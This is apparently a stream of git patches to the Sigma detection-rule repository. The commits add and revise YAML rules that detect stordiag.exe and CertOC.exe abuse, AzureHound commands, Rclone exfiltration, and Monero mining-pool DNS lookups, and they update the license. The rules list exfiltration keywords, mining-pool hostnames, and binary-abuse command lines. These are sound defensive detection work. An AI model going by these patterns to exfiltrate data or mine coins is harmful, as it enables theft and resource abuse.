deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 84a6fc4a..8820ff98 100644 --- a/rules/windows/process_creation_stordiag_execution.yml +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -14,16 +14,17 @@ logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\schtasks.exe' + selection: ParentImage|endswith: '\stordiag.exe' - selection2: - Image|endswith: '\systeminfo.exe' - ParentImage|endswith: '\stordiag.exe' - selection3: - Image|endswith: '\fltmc.exe' - ParentImage|endswith: '\stordiag.exe' - condition: selection1 or selection2 or selection3 + Image|endswith: + - '\schtasks.exe' + - '\systeminfo.exe' + - '\fltmc.exe' + filter: + ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" + - c:\windows\system32\ + - c:\windows\syswow64\ + condition: selection and not filter falsepositives: - Legitimate usage of stordiag.exe. level: high From 4803d61f7f254f5326529a963563c23c3c920741 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 14:09:28 -0500 Subject: [PATCH 1291/1367] Create process_creation_certoc_execution.yml --- .../process_creation_certoc_execution.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml new file mode 100644 index 00000000..1fb83b84 --- /dev/null +++ b/rules/windows/process_creation/process_creation_certoc_execution.yml @@ -0,0 +1,27 @@ +title: Install Certificate via CertOC.exe +id: 242301bc-f92f-4476-8718-78004a6efd9f +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/23 +references: +- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\certoc.exe' + CommandLine|contains|all: + - '-LoadDLL' + - '.dll' + condition: selection +fields: + - CommandLine + - ParentCommandLine +tags: +- attack.defense_evasion +- attack.t1218 +level: medium +falsepositives: +- None From b94610610314dd989018778d2e6083a7b837f330 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 14:09:58 -0500 Subject: [PATCH 1292/1367] Delete process_creation_certoc_execution.yml --- .../process_creation_certoc_execution.yml | 27 ------------------- 1 file changed, 27 deletions(-) delete mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml deleted file mode 100644 index 1fb83b84..00000000 --- a/rules/windows/process_creation/process_creation_certoc_execution.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: Install Certificate via CertOC.exe -id: 242301bc-f92f-4476-8718-78004a6efd9f -description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. -status: experimental -author: Austin Songer @austinsonger -date: 2021/10/23 -references: -- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: '\certoc.exe' - CommandLine|contains|all: - - '-LoadDLL' - - '.dll' - condition: selection -fields: - - CommandLine - - ParentCommandLine -tags: -- attack.defense_evasion -- attack.t1218 -level: medium -falsepositives: -- None From a78d6cce5ff8f4eb34c4b047b09a83875be7cfb1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 14:10:40 -0500 Subject: [PATCH 1293/1367] Create process_creation_certoc_execution.yml --- .../process_creation_certoc_execution.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml new file mode 100644 index 00000000..698a73f3 --- /dev/null +++ b/rules/windows/process_creation/process_creation_certoc_execution.yml @@ -0,0 +1,28 @@ +title: Install Certificate via CertOC.exe +id: 242301bc-f92f-4476-8718-78004a6efd9f +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/23 +references: +- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\certoc.exe' + CommandLine|contains|all: + - '-LoadDLL' + - '.dll' + condition: selection +fields: + - CommandLine + - ParentCommandLine +tags: +- attack.defense_evasion +- attack.t1218 +level: medium +falsepositives: +- None + From a712a0d14e53a52b20e534e952c6bca9419f1a3f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:08:51 +0200 Subject: [PATCH 1294/1367] Create LICENSE --- LICENSE | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 00000000..210f8671 --- /dev/null +++ b/LICENSE @@ -0,0 +1,7 @@ +# Licenses + +The content of this repository is released under the following licenses: + +- The toolchain (everything under tools/) is licensed under the GNU Lesser General Public License +- The Sigma specification is public domain +- Everything else, especially the rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 From 916172de53b38f4ed3f44d7975b69fbb14c6ccb3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:09:35 +0200 Subject: [PATCH 1295/1367] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4815056d..951344e3 100644 --- a/README.md +++ b/README.md @@ -361,9 +361,9 @@ Last but not least, the more people use Sigma, the better, so help promote it by The content of this repository is released under the following licenses: -* The toolchain (everything under `tools/`) is licensed under the [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl-3.0.en.html). -* The [Sigma specification](https://github.com/Neo23x0/sigma/wiki) is public domain. -* Everything else, especially the rules contained in the `rules/` directory is released under the [Detection Rule License (DRL) 1.0](https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md). +* The toolchain (everything under `tools/`) is licensed under the [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl-3.0.en.html) +* The [Sigma specification](https://github.com/Neo23x0/sigma/wiki) is public domain +* The rules contained in the `rules/` directory are released under the [Detection Rule License (DRL) 1.1](https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md) # Credits From f3e530bfbad01cdc20399094f4abbb0b6ad8ed3e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:09:54 +0200 Subject: [PATCH 1296/1367] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index 210f8671..19f1b846 100644 --- a/LICENSE +++ b/LICENSE @@ -4,4 +4,4 @@ The content of this repository is released under the following licenses: - The toolchain (everything under tools/) is licensed under the GNU Lesser General Public License - The Sigma specification is public domain -- Everything else, especially the rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 +- The rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 From 923391224a19b5d250d547d58999aff4822d9cca Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 18:27:36 -0500 Subject: [PATCH 1297/1367] Create powershell_azurehound_commands.yml --- .../powershell_azurehound_commands.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml diff --git a/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml b/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml new file mode 100644 index 00000000..491e1d7c --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml @@ -0,0 +1,30 @@ +title: AzureHound PowerShell Commands +id: 83083ac6-1816-4e76-97d7-59af9a9ae46e +status: experimental +description: +references: + - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/AzureHound.ps1 + - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html +author: Austin Songer (@austinsonger) +date: 2021/10/23 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enable +detection: + selection: + ScriptBlockText|contains: + - "Invoke-AzureHound" + condition: selection +tags: + - attack.discovery + - attack.t1482 + - attack.t1087 + - attack.t1087.001 + - attack.t1087.002 + - attack.t1069.001 + - attack.t1069.002 + - attack.t1069 +falsepositives: + - Penetration testing +level: high From 76aa8bf904c1efbb1882b1da36742d365a5340b7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:50:03 -0500 Subject: [PATCH 1298/1367] Create windows_suspicious_rclone_execution.yml --- .../windows_suspicious_rclone_execution.yml | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 rules/windows/process_creation/windows_suspicious_rclone_execution.yml diff --git a/rules/windows/process_creation/windows_suspicious_rclone_execution.yml b/rules/windows/process_creation/windows_suspicious_rclone_execution.yml new file mode 100644 index 00000000..b73cf7b7 --- /dev/null +++ b/rules/windows/process_creation/windows_suspicious_rclone_execution.yml @@ -0,0 +1,56 @@ +title: Rclone Execution via Command Line or PowerShell +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +status: experimental +date: 2021/05/10 +modified: 2021/06/29 +author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group +references: + - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware + - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a + - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone + - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html +tags: + - attack.exfiltration + - attack.t1567.002 +falsepositives: + - Legitimate Rclone usage (rare) +level: high +logsource: + product: windows + category: process_creation +detection: + exec_selection: + Image|endswith: '\rclone.exe' + ParentImage|endswith: + - '\PowerShell.exe' + - '\cmd.exe' + command_selection: + CommandLine|contains: + - 'pass' + - 'user' + - 'copy' + - 'sync' + - 'config' + - 'lsd' + - 'remote' + - 'ls' + - 'mega' + - 'pcloud' + - 'ftp' + - 'ignore-existing' + - 'auto-confirm' + - 'transfers' + - 'multi-thread-streams' + - 'no-check-certificate ' + description_selection: + Description: 'Rsync for cloud storage' + condition: command_selection and ( description_selection or exec_selection ) +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate RClone use +level: high From a7715490572c3deeecdcdc1706c736e298744632 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:51:50 -0500 Subject: [PATCH 1299/1367] Delete win_susp_rclone_exec.yml --- .../process_creation/win_susp_rclone_exec.yml | 37 ------------------- 1 file changed, 37 deletions(-) delete mode 100644 rules/windows/process_creation/win_susp_rclone_exec.yml diff --git a/rules/windows/process_creation/win_susp_rclone_exec.yml b/rules/windows/process_creation/win_susp_rclone_exec.yml deleted file mode 100644 index b6e35d7a..00000000 --- a/rules/windows/process_creation/win_susp_rclone_exec.yml +++ /dev/null @@ -1,37 +0,0 @@ -title: Rclone Execution via Command Line or PowerShell -id: cb7286ba-f207-44ab-b9e6-760d82b84253 -description: Detects Rclone which is commonly used by ransomware groups for exfiltration -status: experimental -date: 2021/05/26 -author: Aaron Greetham (@beardofbinary) - NCC Group -references: - - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ -tags: - - attack.exfiltration - - attack.t1567.002 -falsepositives: - - Legitimate Rclone usage (rare) -level: high -logsource: - product: windows - category: process_creation -detection: - exec_selection: - Image|endswith: '\rclone.exe' - ParentImage|endswith: - - '\PowerShell.exe' - - '\cmd.exe' - command_selection: - CommandLine|contains: - - ' pass ' - - ' user ' - - ' copy ' - - ' mega ' - - ' sync ' - - ' config ' - - ' lsd ' - - ' remote ' - - ' ls ' - description_selection: - Description: 'Rsync for cloud storage' - condition: command_selection and ( description_selection or exec_selection ) \ No newline at end of file From 2f5e235dfe2451f01d904ce21835ea2e7dea7566 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:51:59 -0500 Subject: [PATCH 1300/1367] Delete sysmon_rclone_execution.yml --- .../sysmon_rclone_execution.yml | 46 ------------------- 1 file changed, 46 deletions(-) delete mode 100644 rules/windows/process_creation/sysmon_rclone_execution.yml diff --git a/rules/windows/process_creation/sysmon_rclone_execution.yml b/rules/windows/process_creation/sysmon_rclone_execution.yml deleted file mode 100644 index 3a0b7dfe..00000000 --- a/rules/windows/process_creation/sysmon_rclone_execution.yml +++ /dev/null @@ -1,46 +0,0 @@ -title: RClone Execution -id: a0d63692-a531-4912-ad39-4393325b2a9c -status: experimental -description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc -tags: - - attack.exfiltration - - attack.t1567.002 -author: Bhabesh Raj, Sittikorn S -date: 2021/05/10 -modified: 2021/06/29 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware - - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone - - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html -fields: - - CommandLine - - ParentCommandLine - - Details -falsepositives: - - Legitimate RClone use -level: high -logsource: - category: process_creation - product: windows -detection: - selection: - Description: 'Rsync for cloud storage' - selection2: - CommandLine|contains|all: - - '--config ' - - '--no-check-certificate ' - - ' copy ' - selection3: - Image|endswith: - - '\rclone.exe' - CommandLine|contains: - - 'mega' - - 'pcloud' - - 'ftp' - - '--progress' - - '--ignore-existing' - - '--auto-confirm' - - '--transfers' - - '--multi-thread-streams' - condition: 1 of them From 05fcc0d8908defbfbe352c72f01094ea076b969c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:52:37 -0500 Subject: [PATCH 1301/1367] Rename windows_suspicious_rclone_execution.yml to win_suspicious_rclone_execution.yml --- ...s_rclone_execution.yml => win_suspicious_rclone_execution.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{windows_suspicious_rclone_execution.yml => win_suspicious_rclone_execution.yml} (100%) diff --git a/rules/windows/process_creation/windows_suspicious_rclone_execution.yml b/rules/windows/process_creation/win_suspicious_rclone_execution.yml similarity index 100% rename from rules/windows/process_creation/windows_suspicious_rclone_execution.yml rename to rules/windows/process_creation/win_suspicious_rclone_execution.yml From 2d781ac20b19ab29b3162783a7ffb9d6131ab088 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:55:19 -0500 Subject: [PATCH 1302/1367] Rename win_suspicious_rclone_execution.yml to win_susp_rclone_execution.yml --- ...picious_rclone_execution.yml => win_susp_rclone_execution.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{win_suspicious_rclone_execution.yml => win_susp_rclone_execution.yml} (100%) diff --git a/rules/windows/process_creation/win_suspicious_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml similarity index 100% rename from rules/windows/process_creation/win_suspicious_rclone_execution.yml rename to rules/windows/process_creation/win_susp_rclone_execution.yml From c8383901e131603d1a50ef360064dc1138b8128a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:56:43 -0500 Subject: [PATCH 1303/1367] Update win_susp_rclone_execution.yml --- rules/windows/process_creation/win_susp_rclone_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index b73cf7b7..0f822a36 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -3,7 +3,7 @@ id: e37db05d-d1f9-49c8-b464-cee1a4b11638 description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 -modified: 2021/06/29 +modified: 2021/10/23 author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ From 9664ec4c35f254c2f10f84e1aa5cbd98b80b9fc0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:59:37 -0500 Subject: [PATCH 1304/1367] Update win_susp_rclone_execution.yml --- .../process_creation/win_susp_rclone_execution.yml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 0f822a36..eca69f3a 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -11,12 +11,6 @@ references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html -tags: - - attack.exfiltration - - attack.t1567.002 -falsepositives: - - Legitimate Rclone usage (rare) -level: high logsource: product: windows category: process_creation @@ -51,6 +45,9 @@ fields: - CommandLine - ParentCommandLine - Details +tags: + - attack.exfiltration + - attack.t1567.002 falsepositives: - Legitimate RClone use level: high From 4dc82c95b6164b526fb57536aabf23c35ef368f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 08:52:23 +0200 Subject: [PATCH 1305/1367] Update process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 8820ff98..1cd93031 100644 --- a/rules/windows/process_creation_stordiag_execution.yml +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -14,17 +14,17 @@ logsource: category: process_creation product: windows detection: - selection: + selection: ParentImage|endswith: '\stordiag.exe' Image|endswith: - - '\schtasks.exe' - - '\systeminfo.exe' - - '\fltmc.exe' + - '\schtasks.exe' + - '\systeminfo.exe' + - '\fltmc.exe' filter: ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - - c:\windows\system32\ - - c:\windows\syswow64\ - condition: selection and not filter + - c:\windows\system32\ + - c:\windows\syswow64\ + condition: selection and not filter falsepositives: - Legitimate usage of stordiag.exe. level: high From 587c413a12046b2b7499d8b5fe3ee7227eb504fd Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 09:08:20 +0200 Subject: [PATCH 1306/1367] fix typo error --- rules/windows/process_creation_stordiag_execution.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 1cd93031..b3302e51 100644 --- a/rules/windows/process_creation_stordiag_execution.yml +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -21,9 +21,9 @@ detection: - '\systeminfo.exe' - '\fltmc.exe' filter: - ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - - c:\windows\system32\ - - c:\windows\syswow64\ + ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" + - 'c:\windows\system32\' + - 'c:\windows\syswow64\' condition: selection and not filter falsepositives: - Legitimate usage of stordiag.exe. From 86e9f782cbfd5489ef0bc6d8d10864506376a9d8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 24 Oct 2021 15:44:44 +0200 Subject: [PATCH 1307/1367] rule: monero mining pools dns lookup --- .../network/net_pua_cryptocoin_mining_xmr.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/network/net_pua_cryptocoin_mining_xmr.yml diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml new file mode 100644 index 00000000..972bea29 --- /dev/null +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml @@ -0,0 +1,37 @@ +title: Monero Crypto Coin Mining Pool Connection +id: b593fd50-7335-4682-a36c-4edcb68e4641 +status: stable +description: Detects suspicious DNS queries to Monero mining pools +author: Florian Roth +date: 2021/10/24 +references: + - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ +logsource: + category: dns +detection: + selection: + query|contains: + - 'pool.minexmr.com + - 'fr.minexmr.com + - 'de.minexmr.com + - 'sg.minexmr.com + - 'ca.minexmr.com + - 'us-west.minexmr.com + - 'pool.supportxmr.com + - 'mine.c3pool.com + - 'xmr-eu1.nanopool.org + - 'xmr-eu2.nanopool.org + - 'xmr-us-east1.nanopool.org + - 'xmr-us-west1.nanopool.org + - 'xmr-asia1.nanopool.org + - 'xmr-jp1.nanopool.org + - 'xmr-au1.nanopool.org + - 'xmr.2miners.com + - 'xmr.hashcity.org + - 'xmr.f2pool.com + - 'xmrpool.eu + - 'pool.hashvault.pro + condition: selection +falsepositives: + - Legeitimate crypto coin mining +level: high From 7eeecf9c6a28664ce75d4a333fe2c178270255d4 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 24 Oct 2021 15:46:31 +0200 Subject: [PATCH 1308/1367] fix: missing upper tick in every line --- .../network/net_pua_cryptocoin_mining_xmr.yml | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml index 972bea29..580d2861 100644 --- a/rules/network/net_pua_cryptocoin_mining_xmr.yml +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml @@ -11,26 +11,26 @@ logsource: detection: selection: query|contains: - - 'pool.minexmr.com - - 'fr.minexmr.com - - 'de.minexmr.com - - 'sg.minexmr.com - - 'ca.minexmr.com - - 'us-west.minexmr.com - - 'pool.supportxmr.com - - 'mine.c3pool.com - - 'xmr-eu1.nanopool.org - - 'xmr-eu2.nanopool.org - - 'xmr-us-east1.nanopool.org - - 'xmr-us-west1.nanopool.org - - 'xmr-asia1.nanopool.org - - 'xmr-jp1.nanopool.org - - 'xmr-au1.nanopool.org - - 'xmr.2miners.com - - 'xmr.hashcity.org - - 'xmr.f2pool.com - - 'xmrpool.eu - - 'pool.hashvault.pro + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' condition: selection falsepositives: - Legeitimate crypto coin mining From d051e1418bed4b3747ee427a08446acd1c9c25bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 24 Oct 2021 15:47:14 +0200 Subject: [PATCH 1309/1367] docs: changed title --- rules/network/net_pua_cryptocoin_mining_xmr.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml index 580d2861..e4506892 100644 --- a/rules/network/net_pua_cryptocoin_mining_xmr.yml +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml @@ -1,4 +1,4 @@ -title: Monero Crypto Coin Mining Pool Connection +title: Monero Crypto Coin Mining Pool Lookup id: b593fd50-7335-4682-a36c-4edcb68e4641 status: stable description: Detects suspicious DNS queries to Monero mining pools From d4b396f82358af07d96bd71f4c7549ea8dc2b359 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:02:34 -0500 Subject: [PATCH 1310/1367] Create sysmon_rclone_execution.yml --- .../deprecated/sysmon_rclone_execution.yml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 rules/windows/deprecated/sysmon_rclone_execution.yml diff --git a/rules/windows/deprecated/sysmon_rclone_execution.yml b/rules/windows/deprecated/sysmon_rclone_execution.yml new file mode 100644 index 00000000..3a0b7dfe --- /dev/null +++ b/rules/windows/deprecated/sysmon_rclone_execution.yml @@ -0,0 +1,46 @@ +title: RClone Execution +id: a0d63692-a531-4912-ad39-4393325b2a9c +status: experimental +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +tags: + - attack.exfiltration + - attack.t1567.002 +author: Bhabesh Raj, Sittikorn S +date: 2021/05/10 +modified: 2021/06/29 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware + - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a + - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone + - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate RClone use +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + Description: 'Rsync for cloud storage' + selection2: + CommandLine|contains|all: + - '--config ' + - '--no-check-certificate ' + - ' copy ' + selection3: + Image|endswith: + - '\rclone.exe' + CommandLine|contains: + - 'mega' + - 'pcloud' + - 'ftp' + - '--progress' + - '--ignore-existing' + - '--auto-confirm' + - '--transfers' + - '--multi-thread-streams' + condition: 1 of them From c4153f471f7514a7f65c86b6bbc82456d45488a5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:02:55 -0500 Subject: [PATCH 1311/1367] Create win_susp_rclone_exec.yml --- .../deprecated/win_susp_rclone_exec.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/windows/deprecated/win_susp_rclone_exec.yml diff --git a/rules/windows/deprecated/win_susp_rclone_exec.yml b/rules/windows/deprecated/win_susp_rclone_exec.yml new file mode 100644 index 00000000..38f5b1c2 --- /dev/null +++ b/rules/windows/deprecated/win_susp_rclone_exec.yml @@ -0,0 +1,37 @@ +title: Rclone Execution via Command Line or PowerShell +id: cb7286ba-f207-44ab-b9e6-760d82b84253 +description: Detects Rclone which is commonly used by ransomware groups for exfiltration +status: experimental +date: 2021/05/26 +author: Aaron Greetham (@beardofbinary) - NCC Group +references: + - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ +tags: + - attack.exfiltration + - attack.t1567.002 +falsepositives: + - Legitimate Rclone usage (rare) +level: high +logsource: + product: windows + category: process_creation +detection: + exec_selection: + Image|endswith: '\rclone.exe' + ParentImage|endswith: + - '\PowerShell.exe' + - '\cmd.exe' + command_selection: + CommandLine|contains: + - ' pass ' + - ' user ' + - ' copy ' + - ' mega ' + - ' sync ' + - ' config ' + - ' lsd ' + - ' remote ' + - ' ls ' + description_selection: + Description: 'Rsync for cloud storage' + condition: command_selection and ( description_selection or exec_selection ) From 5ded3e681c89edb653b8173570179433093dc749 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:04:34 -0500 Subject: [PATCH 1312/1367] Update win_susp_rclone_execution.yml --- .../process_creation/win_susp_rclone_execution.yml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index eca69f3a..4b20bb67 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -3,7 +3,7 @@ id: e37db05d-d1f9-49c8-b464-cee1a4b11638 description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 -modified: 2021/10/23 +modified: 2021/10/24 author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ @@ -51,3 +51,9 @@ tags: falsepositives: - Legitimate RClone use level: high +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +related: + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes From 85d7cb6f3ed24823edc0b978ce93c21f10bc215e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:06:51 -0500 Subject: [PATCH 1313/1367] Update process_creation_certoc_execution.yml --- .../process_creation/process_creation_certoc_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml index 698a73f3..cbb41014 100644 --- a/rules/windows/process_creation/process_creation_certoc_execution.yml +++ b/rules/windows/process_creation/process_creation_certoc_execution.yml @@ -1,4 +1,4 @@ -title: Install Certificate via CertOC.exe +title: Suspicious Load DLL via CertOC.exe id: 242301bc-f92f-4476-8718-78004a6efd9f description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. status: experimental From db640f6080e0d875025c4b6c90d22ae3b91a5762 